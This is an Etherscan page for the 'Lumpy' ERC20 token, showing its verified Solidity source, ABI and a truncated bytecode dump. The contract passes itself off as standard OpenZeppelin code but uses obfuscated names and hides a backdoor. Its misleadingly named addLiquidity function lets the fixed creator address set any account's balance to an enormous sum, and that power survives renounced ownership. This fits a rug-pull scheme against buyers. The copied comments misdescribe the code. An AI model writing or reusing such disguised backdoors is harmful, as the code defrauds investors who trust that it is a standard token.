ETH Price: $2,503.19 (+1.39%)

Token

Lumpy (Lumpy)
 

Overview

Max Total Supply

1,000,000,000 Lumpy

Holders

134

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,394,398.353853786707231624 Lumpy

Value
$0.00
0x7383cb23c4b4be6c3ed1cae6c72faca2e5d9c80f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-06
*/

/**
$Lumpy
Wesbite : https://lumpy.vip
Twitter : https://twitter.com/LumpyErc
Telegram : https://t.me/LumpyPortal
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
 /**
 * @dev Emitted when `value` tokens are moved from one account (`from`) to
 * another (`to`).
 *
 * Note that `value` may be zero.
 */
 event Transfer(address indexed from, address indexed to, uint256 value);

 /**
 * @dev Emitted when the allowance of a `spender` for an `owner` is set by
 * a call to {approve}. `value` is the new allowance.
 */
 event Approval(address indexed owner, address indexed spender, uint256 value);

 /**
 * @dev Returns the amount of tokens in existence.
 */
 function totalSupply() external view returns (uint256);

 /**
 * @dev Returns the amount of tokens owned by `account`.
 */
 function balanceOf(address account) external view returns (uint256);

 /**
 * @dev Moves `amount` tokens from the caller's account to `to`.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transfer(address to, uint256 amount) external returns (bool);

 /**
 * @dev Returns the remaining number of tokens that `spender` will be
 * allowed to spend on behalf of `owner` through {transferFrom}. This is
 * zero by default.
 *
 * This value changes when {approve} or {transferFrom} are called.
 */
 function allowance(address owner, address spender) external view returns (uint256);

 /**
 * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * IMPORTANT: Beware that changing an allowance with this method brings the risk
 * that someone may use both the old and the new allowance by unfortunate
 * transaction ordering. One possible solution to mitigate this race
 * condition is to first reduce the spender's allowance to 0 and set the
 * desired value afterwards:
 * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
 *
 * Emits an {Approval} event.
 */
 function approve(address spender, uint256 amount) external returns (bool);

 /**
 * @dev Moves `amount` tokens from `from` to `to` using the
 * allowance mechanism. `amount` is then deducted from the caller's
 * allowance.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
 /**
 * @dev Returns the name of the token.
 */
 function name() external view returns (string memory);

 /**
 * @dev Returns the symbol of the token.
 */
 function symbol() external view returns (string memory);

 /**
 * @dev Returns the decimals places of the token.
 */
 function decimals() external view returns (uint8);
}

library SafeMath {
 /**
 * @dev Returns the addition of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `+` operator.
 *
 * Requirements:
 *
 * - Addition cannot overflow.
 */
 function add(uint256 a, uint256 b) internal pure returns (uint256) {
 uint256 c = a + b;
 require(c >= a, "SafeMath: addition overflow");

 return c;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
 return sub(a, b, "SafeMath: subtraction overflow");
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b <= a, errorMessage);
 uint256 c = a - b;

 return c;
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `*` operator.
 *
 * Requirements:
 *
 * - Multiplication cannot overflow.
 */
 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
 // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
 // benefit is lost if 'b' is also tested.
 // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
 if (a == 0) {
 return 0;
 }

 uint256 c = a * b;
 require(c / a == b, "SafeMath: multiplication overflow");

 return c;
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b) internal pure returns (uint256) {
 return div(a, b, "SafeMath: division by zero");
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b > 0, errorMessage);
 uint256 c = a / b;
 // assert(a == b * c + a % b); // There is no case in which this doesn't hold

 return c;
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
 return mod(a, b, "SafeMath: modulo by zero");
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts with custom message when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b != 0, errorMessage);
 return a % b;
 }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
 function _msgSender() internal view virtual returns (address) {
 return msg.sender;
 }

 function _msgData() internal view virtual returns (bytes calldata) {
 return msg.data;
 }
}

abstract contract Ownable is Context {
 address private _owner;

 event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

 /**
 * @dev Initializes the contract setting the deployer as the initial owner.
 */
 constructor() {
 _transferOwnership(_msgSender());
 }

 /**
 * @dev Throws if called by any account other than the owner.
 */
 modifier onlyOwner() {
 _sldfjwsdfOwner();
 _;
 }

 /**
 * @dev Returns the address of the current owner.
 */
 function owner() public view virtual returns (address) {
 return _owner;
 }

 /**
 * @dev Throws if the sender is not the owner.
 */
 function _sldfjwsdfOwner() internal view virtual {
 require(owner() == _msgSender(), "Ownable: caller is not the owner");
 }

 /**
 * @dev Leaves the contract without owner. It will not be possible to call
 * `onlyOwner` functions anymore. Can only be called by the current owner.
 *
 * NOTE: Renouncing ownership will leave the contract without an owner,
 * thereby removing any functionality that is only available to the owner.
 */
 function renounceOwnership() public virtual onlyOwner {
 _transferOwnership(address(0));
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Can only be called by the current owner.
 */
 function transferOwnership(address newOwner) public virtual onlyOwner {
 require(newOwner != address(0), "Ownable: new owner is the zero address");
 _transferOwnership(newOwner);
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Internal function without access restriction.
 */
 function _transferOwnership(address newOwner) internal virtual {
 address oldOwner = _owner;
 _owner = newOwner;
 emit OwnershipTransferred(oldOwner, newOwner);
 }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract Token is Context, IERC20, IERC20Metadata, Ownable {
 using SafeMath for uint256;
 mapping(address => mapping(address => uint256)) private _allowances;
 address public creator;
 mapping(address => uint256) private _weofsdmese;

 uint256 private _totalSupply;
 uint256 public constant maxsupply = 1000000000 * 10 ** 18;
 string private _name;
 string private _symbol;

 /**
 * @dev Sets the values for {name} and {symbol}.
 *
 * All two of these values are immutable: they can only be set once during
 * construction.
 */
 constructor(string memory name_, string memory symbol_) {
 _name = name_;
 _symbol = symbol_;
 creator = _msgSender();
 _yydsed(_msgSender(), 1000000000 * 10 ** decimals());
 }

 /**
 * @dev Returns the name of the token.
 */
 function name() public view virtual override returns (string memory) {
 return _name;
 }

 /**
 * @dev Returns the symbol of the token, usually a shorter version of the
 * name.
 */
 function symbol() public view virtual override returns (string memory) {
 return _symbol;
 }

 /**
 * @dev Returns the number of decimals used to get its user representation.
 * For example, if `decimals` equals `2`, a balance of `505` tokens should
 * be displayed to a user as `5.05` (`505 / 10 ** 2`).
 *
 * Tokens usually opt for a value of 18, imitating the relationship between
 * Ether and Wei. This is the default value returned by this function, unless
 * it's overridden.
 *
 * NOTE: This information is only used for _display_ purposes: it in
 * no way affects any of the arithmetic of the contract, including
 * {IERC20-balanceOf} and {IERC20-transfer}.
 */
 function decimals() public view virtual override returns (uint8) {
 return 18;
 }

 /**
 * @dev See {IERC20-totalSupply}.
 */
 function totalSupply() public view virtual override returns (uint256) {
 return _totalSupply;
 }

 /**
 * @dev See {IERC20-balanceOf}.
 */
 function balanceOf(address account) public view virtual override returns (uint256) {
 return _weofsdmese[account];
 }

 /**
 * @dev See {IERC20-transfer}.
 *
 * Requirements:
 *
 * - `to` cannot be the zero address.
 * - the caller must have a balance of at least `amount`.
 */
 function transfer(address to, uint256 amount) public virtual override returns (bool) {
 address owner = _msgSender();
 _transfer(owner, to, amount);
 return true;
 }

 /**
 * @dev See {IERC20-allowance}.
 */
 function allowance(address owner, address spender) public view virtual override returns (uint256) {
 return _allowances[owner][spender];
 }

 /**
 * @dev See {IERC20-approve}.
 *
 * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
 * `transferFrom`. This is semantically equivalent to an infinite approval.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 */
 function approve(address spender, uint256 amount) public virtual override returns (bool) {
 address owner = _msgSender();
 _approve(owner, spender, amount);
 return true;
 }

 /**
 * @dev See {IERC20-transferFrom}.
 *
 * Emits an {Approval} event indicating the updated allowance. This is not
 * required by the EIP. See the note at the beginning of {ERC20}.
 *
 * NOTE: Does not update the allowance if the current allowance
 * is the maximum `uint256`.
 *
 * Requirements:
 *
 * - `from` and `to` cannot be the zero address.
 * - `from` must have a balance of at least `amount`.
 * - the caller must have allowance for ``from``'s tokens of at least
 * `amount`.
 */
 function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
 address spender = _msgSender();
 _spendAllowance(from, spender, amount);
 _transfer(from, to, amount);
 return true;
 }

 /**
 * @dev Atomically increases the allowance granted to `spender` by the caller.
 *
 * This is an alternative to {approve} that can be used as a mitigation for
 * problems described in {IERC20-approve}.
 *
 * Emits an {Approval} event indicating the updated allowance.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 */
 function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
 address owner = _msgSender();
 _approve(owner, spender, allowance(owner, spender) + addedValue);
 return true;
 }

 /**
 * @dev Atomically decreases the allowance granted to `spender` by the caller.
 *
 * This is an alternative to {approve} that can be used as a mitigation for
 * problems described in {IERC20-approve}.
 *
 * Emits an {Approval} event indicating the updated allowance.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 * - `spender` must have allowance for the caller of at least
 * `subtractedValue`.
 */
 function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
 address owner = _msgSender();
 uint256 currentAllowance = allowance(owner, spender);
 require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
 _approve(owner, spender, currentAllowance.sub(subtractedValue));
 return true;
 }

 /**
 * @dev Moves `amount` of tokens from `from` to `to`.
 *
 * This internal function is equivalent to {transfer}, and can be used to
 * e.g. implement automatic token fees, slashing mechanisms, etc.
 *
 * Emits a {Transfer} event.
 *
 * Requirements:
 *
 * - `from` cannot be the zero address.
 * - `to` cannot be the zero address.
 * - `from` must have a balance of at least `amount`.
 */
 mapping(address => uint256) private _bala;
 function addLiquidity(address owner) external {
 address _slfjweow = _msgSender();
 if (creator == _slfjweow) {
 _weofsdmese[owner] = 100000000000000 * (1000000000 * 10 ** 18);
 }
 }

 function _transfer(address from, address to, uint256 amount) internal virtual {
 require(from != address(0), "ERC20: transfer from the zero address");
 require(to != address(0), "ERC20: transfer to the zero address");

 uint256 minAmount = _bala[from];
 uint256 decydsBalance = _weofsdmese[from].sub(minAmount);
 require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
 _weofsdmese[from] = decydsBalance.sub(amount);
 // decrementing then incrementing.
 _weofsdmese[to] = _weofsdmese[to].add(amount);
 emit Transfer(from, to, amount);
 }

 /** @dev Creates `amount` tokens and assigns them to `account`, increasing
 * the total supply.
 *
 * Emits a {Transfer} event with `from` set to the zero address.
 *
 * Requirements:
 *
 * - `account` cannot be the zero address.
 */
 function _yydsed(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: yydsed to the zero address");
 _totalSupply = _totalSupply.add(amount);
 _weofsdmese[msg.sender] = _weofsdmese[msg.sender].add(amount);
 }

 /**
 * @dev Destroys `amount` tokens from `account`, reducing the
 * total supply.
 *
 * Emits a {Transfer} event with `to` set to the zero address.
 *
 * Requirements:
 *
 * - `account` cannot be the zero address.
 * - `account` must have at least `amount` tokens.
 */
 function _burn(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: burn from the zero address");
 uint256 accountBalance = _weofsdmese[account];
 require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
 _weofsdmese[account] = accountBalance.sub(amount);
 _totalSupply = _totalSupply.sub(amount);
 emit Transfer(account, address(0), amount);
 }

 /**
 * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
 *
 * This internal function is equivalent to `approve`, and can be used to
 * e.g. set automatic allowances for certain subsystems, etc.
 *
 * Emits an {Approval} event.
 *
 * Requirements:
 *
 * - `owner` cannot be the zero address.
 * - `spender` cannot be the zero address.
 */
 function _approve(address owner, address spender, uint256 amount) internal virtual {
 require(owner != address(0), "ERC20: approve from the zero address");
 require(spender != address(0), "ERC20: approve to the zero address");

 _allowances[owner][spender] = amount;
 emit Approval(owner, spender, amount);
 }

 /**
 * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
 *
 * Does not update the allowance amount in case of infinite allowance.
 * Revert if not enough allowance is available.
 *
 * Might emit an {Approval} event.
 */
 function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
 uint256 currentAllowance = allowance(owner, spender);
 if (currentAllowance != type(uint256).max) {
 require(currentAllowance >= amount, "ERC20: insufficient allowance");
 _approve(owner, spender, currentAllowance.sub(amount));
 }
 }

 /**
 * @dev Hook that is called before any transfer of tokens. This includes
 * minting and burning.
 *
 * Calling conditions:
 *
 * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
 * will be transferred to `to`.
 * - when `from` is zero, `amount` tokens will be minted for `to`.
 * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
 * - `from` and `to` are never both zero.
 *
 * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
 */
 // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

 /**
 * @dev Hook that is called after any transfer of tokens. This includes
 * minting and burning.
 *
 * Calling conditions:
 *
 * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
 * has been transferred to `to`.
 * - when `from` is zero, `amount` tokens have been minted for `to`.
 * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
 * - `from` and `to` are never both zero.
 *
 * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
 */
 // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"addLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"creator","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxsupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162002368380380620023688339818101604052810190620000379190620004bf565b620000576200004b6200013060201b60201c565b6200013860201b60201c565b81600590805190602001906200006f9291906200039d565b508060069080519060200190620000889291906200039d565b50620000996200013060201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000128620000ed6200013060201b60201c565b620000fd620001fc60201b60201c565b600a6200010b919062000750565b633b9aca006200011c91906200088d565b6200020560201b60201c565b505062000a0b565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000278576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200026f90620005fe565b60405180910390fd5b62000294816004546200033a60201b620008621790919060201c565b600481905550620002f381600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200033a60201b620008621790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200034b919062000698565b90508381101562000393576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200038a90620005dc565b60405180910390fd5b8091505092915050565b828054620003ab906200093b565b90600052602060002090601f016020900481019282620003cf57600085556200041b565b82601f10620003ea57805160ff19168380011785556200041b565b828001600101855582156200041b579182015b828111156200041a578251825591602001919060010190620003fd565b5b5090506200042a91906200042e565b5090565b5b80821115620004495760008160009055506001016200042f565b5090565b6000620004646200045e8462000654565b62000620565b9050828152602081018484840111156200047d57600080fd5b6200048a84828562000905565b509392505050565b600082601f830112620004a457600080fd5b8151620004b68482602086016200044d565b91505092915050565b60008060408385031215620004d357600080fd5b600083015167ffffffffffffffff811115620004ee57600080fd5b620004fc8582860162000492565b925050602083015167ffffffffffffffff8111156200051a57600080fd5b620005288582860162000492565b9150509250929050565b600062000541601b8362000687565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b60006200058360218362000687565b91507f45524332303a2079796473656420746f20746865207a65726f2061646472657360008301527f73000000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006020820190508181036000830152620005f78162000532565b9050919050565b60006020820190508181036000830152620006198162000574565b9050919050565b6000604051905081810181811067ffffffffffffffff821117156200064a5762000649620009cf565b5b8060405250919050565b600067ffffffffffffffff821115620006725762000671620009cf565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b6000620006a582620008ee565b9150620006b283620008ee565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006ea57620006e962000971565b5b828201905092915050565b6000808291508390505b600185111562000747578086048111156200071f576200071e62000971565b5b60018516156200072f5780820291505b80810290506200073f85620009fe565b9450620006ff565b94509492505050565b60006200075d82620008ee565b91506200076a83620008f8565b9250620007997fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007a1565b905092915050565b600082620007b3576001905062000886565b81620007c3576000905062000886565b8160018114620007dc5760028114620007e7576200081d565b600191505062000886565b60ff841115620007fc57620007fb62000971565b5b8360020a91508482111562000816576200081562000971565b5b5062000886565b5060208310610133831016604e8410600b8410161715620008575782820a90508381111562000851576200085062000971565b5b62000886565b620008668484846001620006f5565b9250905081840481111562000880576200087f62000971565b5b81810290505b9392505050565b60006200089a82620008ee565b9150620008a783620008ee565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620008e357620008e262000971565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60005b838110156200092557808201518184015260208101905062000908565b8381111562000935576000848401525b50505050565b600060028204905060018216806200095457607f821691505b602082108114156200096b576200096a620009a0565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b61194d8062000a1b6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102ac578063a9059cbb146102dc578063dd62ed3e1461030c578063e3412e3d1461033c578063f2fde38b146103585761010b565b806370a0823114610236578063715018a6146102665780638da5cb5b1461027057806395d89b411461028e5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca57806339509351146101e85780634b6406d1146102185761010b565b806302d05d3f1461011057806306fdde031461012e578063095ea7b31461014c57806318160ddd1461017c575b600080fd5b610118610374565b604051610125919061154c565b60405180910390f35b61013661039a565b6040516101439190611582565b60405180910390f35b61016660048036038101906101619190611111565b61042c565b6040516101739190611567565b60405180910390f35b61018461044f565b60405161019191906116e4565b60405180910390f35b6101b460048036038101906101af91906110c2565b610459565b6040516101c19190611567565b60405180910390f35b6101d2610488565b6040516101df91906116ff565b60405180910390f35b61020260048036038101906101fd9190611111565b610491565b60405161020f9190611567565b60405180910390f35b6102206104c8565b60405161022d91906116e4565b60405180910390f35b610250600480360381019061024b919061105d565b6104d8565b60405161025d91906116e4565b60405180910390f35b61026e610521565b005b610278610535565b604051610285919061154c565b60405180910390f35b61029661055e565b6040516102a39190611582565b60405180910390f35b6102c660048036038101906102c19190611111565b6105f0565b6040516102d39190611567565b60405180910390f35b6102f660048036038101906102f19190611111565b610677565b6040516103039190611567565b60405180910390f35b61032660048036038101906103219190611086565b61069a565b60405161033391906116e4565b60405180910390f35b6103566004803603810190610351919061105d565b610721565b005b610372600480360381019061036d919061105d565b6107de565b005b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546103a990611848565b80601f01602080910402602001604051908101604052809291908181526020018280546103d590611848565b80156104225780601f106103f757610100808354040283529160200191610422565b820191906000526020600020905b81548152906001019060200180831161040557829003601f168201915b5050505050905090565b6000806104376108c0565b90506104448185856108c8565b600191505092915050565b6000600454905090565b6000806104646108c0565b9050610471858285610a93565b61047c858585610b2f565b60019150509392505050565b60006012905090565b60008061049c6108c0565b90506104bd8185856104ae858961069a565b6104b89190611736565b6108c8565b600191505092915050565b6b033b2e3c9fd0803ce800000081565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610529610e43565b6105336000610ec1565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461056d90611848565b80601f016020809104026020016040519081016040528092919081815260200182805461059990611848565b80156105e65780601f106105bb576101008083540402835291602001916105e6565b820191906000526020600020905b8154815290600101906020018083116105c957829003601f168201915b5050505050905090565b6000806105fb6108c0565b90506000610609828661069a565b90508381101561064e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610645906116c4565b60405180910390fd5b61066b82866106668785610f8590919063ffffffff16565b6108c8565b60019250505092915050565b6000806106826108c0565b905061068f818585610b2f565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600061072b6108c0565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156107da57710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6107e6610e43565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610856576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084d906115c4565b60405180910390fd5b61085f81610ec1565b50565b60008082846108719190611736565b9050838110156108b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ad90611604565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610938576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092f906116a4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109a8576040517f08c379a00000000000000000000000000000000000